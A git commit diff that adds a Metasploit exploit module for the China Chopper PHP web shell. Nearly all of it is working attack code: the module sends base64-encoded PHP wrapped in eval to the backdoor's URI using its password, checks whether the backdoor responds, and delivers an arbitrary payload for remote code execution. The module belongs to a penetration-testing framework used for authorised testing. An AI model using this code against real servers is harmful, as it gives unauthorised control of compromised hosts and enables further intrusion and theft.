Land rapid7#6144, China Chopper Web Shell (Backdoor) module

wchen-r7 · wchen-r7 · commit 46fac897bdb4 · 2015-11-05T18:29:36.000-06:00
diff --git a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb
@@ -0,0 +1,70 @@
+
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'              => 'China Chopper Caidao PHP Backdoor Code Execution',
+      'Description'       => %q{
+        This module takes advantage of the China Chopper Webshell that is
+        commonly used by Chinese hackers.
+      },
+      'License'           => MSF_LICENSE,
+      'Author'            => ['Nixawk'],
+      'References'        =>
+        [
+          ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],
+          ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html']
+        ],
+      'Platform'          => ['php'],
+      'Arch'              => ARCH_PHP,
+      'Targets'           =>
+        [
+          ['Automatic', {}]
+        ],
+      'Privileged'        => false,
+      'DisclosureDate'    => 'Oct 27 2015',
+      'DefaultTarget'     => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path of backdoor', '/caidao.php']),
+        OptString.new('PASSWORD', [true, 'The password of backdoor', 'chopper'])
+      ], self.class)
+  end
+
+  def http_send_command(code)
+    code = "eval(base64_decode(\"#{Rex::Text.encode_base64(code)}\"));"
+    send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path),
+      'vars_post' => {
+        "#{datastore['PASSWORD']}" => code
+      }
+    })
+  end
+
+  def check
+    flag = Rex::Text.rand_text_alpha(16)
+    res = http_send_command("printf(\"#{flag}\");")
+    if res && res.body =~ /#{flag}/m
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    print_status("#{peer} - Sending exploit...")
+    http_send_command(payload.raw)
+  end
+end
